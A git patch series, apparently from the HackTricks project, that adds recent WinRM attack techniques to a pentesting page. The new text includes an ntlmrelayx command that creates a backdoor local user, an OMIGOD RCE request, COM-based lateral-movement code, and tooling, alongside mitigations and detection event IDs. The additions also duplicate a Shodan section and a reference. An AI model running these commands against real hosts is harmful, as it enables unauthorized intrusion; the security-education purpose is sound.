From 91348afa2246e1dd3a1373b581dbc84c76c30927 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 13 Aug 2025 01:45:46 +0000 Subject: [PATCH 1/2] Add content from: Research Update: Enhanced src/network-services-pentesting/59... --- .../5985-5986-pentesting-winrm.md | 73 ++++++++++++++++++- src/welcome/hacktricks-values-and-faq.md | 3 +- 2 files changed, 73 insertions(+), 3 deletions(-) diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md index b2e36a871..fd7931479 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -256,8 +256,80 @@ end - `port:5985 Microsoft-HTTPAPI` +--- + +## Recent Vulnerabilities & Offensive Techniques (2021-2025) + +### NTLM relay directly to WinRM (WS-MAN) +Since Impacket 0.11 (May 2023) `ntlmrelayx.py` can relay captured NTLM credentials straight to a **WS-MAN**/WinRM listener. When a host still listens on **unencrypted HTTP (5985)** an attacker can combine *mitm6* (or *Responder*) to coerce authentication and obtain SYSTEM-level code-execution: + +```bash +sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \ + --command "net user pwned P@ssw0rd! /add" +``` + +Mitigations +* Disable HTTP listeners – `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false` +* Force HTTPS and enable Extended Protection for Authentication (EPA) on recent Windows versions. + +### OMIGOD – CVE-2021-38647 (Azure OMI) +Azure Linux agents use the **Open Management Infrastructure (OMI)** service which exposes the WinRM/WS-MAN API on ports **5985/5986**. A logic error allowed **unauthenticated RCE as root**: + +```text +curl http://victim:5985/wsman -H 'Content-Type:text/xml' -d '' +``` + +Patch or remove OMI (version ≥ 1.6.8-1) and block those ports from the Internet. + +### WSMan.Automation COM abuse for lateral movement +WinRM can be driven without PowerShell via the `WSMan.Automation` COM object – useful on systems in Constrained-Language mode. Tools such as *SharpWSManWinRM* wrap this technique: + +```powershell +$ws = New-Object -ComObject 'WSMan.Automation' +$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null) +$cmdId = $session.Command('cmd.exe',@('/c','whoami')) +$session.Signal($cmdId,0) +``` + +The execution chain (`svchost → wmiprvse → cmd.exe`) is identical to classic PS-Remoting. + +--- + +## Tooling updates + +* **Evil-WinRM v3.x (2024)** – now supports **Kerberos** (`-k` / `--spn`) and **certificate-based** authentication (`--cert-pem`/`--key-pem`), session logging (`-L`) and the ability to disable remote path completion (`-N`). + + ```bash + RHOST=10.0.0.25 evil-winrm -i $RHOST -u j.doe -k --spn HTTP/$RHOST + ``` + +* **Python – `pypsrp` 0.9 (2024)** offers WinRM & PS-Remoting from Linux, including CredSSP and Kerberos: + + ```python + from psrp.client import Client + c = Client('srv01', username='ACME\\j.doe', ssl=True) + print(c.execute_cmd('ipconfig /all').std_out.decode()) + ``` + +* **Detection** – monitor the **Microsoft-Windows-WinRM/Operational** log: + * Event 91 / 163 – shell created + * Event 182 – authentication failure + * In the Security log event 4262 records the source IP (added July 2022 CUs). + Collect these centrally and alert on anonymous or external IPs. + +--- + +## Shodan + +- `port:5985 Microsoft-HTTPAPI` + ## References +- [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) +- [https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/](https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/) +- [https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure) + + - [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/) ## HackTricks Automatic Commands @@ -304,4 +376,3 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index a5b53905c..dd6a54063 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I cite a page of HackTricks?** +> - **How can I a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the {{#include ../banners/hacktricks-training.md}} - From c64511c1bc87d66b89e06b37d665fd3ba7192abb Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Wed, 13 Aug 2025 17:00:32 +0200 Subject: [PATCH 2/2] Update hacktricks-values-and-faq.md --- src/welcome/hacktricks-values-and-faq.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index dd6a54063..bce76c622 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con > [!TIP] > -> - **How can I a page of HackTricks?** +> - **How can I cite a page of HackTricks?** As long as the link **of** the page(s) where you took the information from appears it's enough.\ If you need a bibtex you can use something like: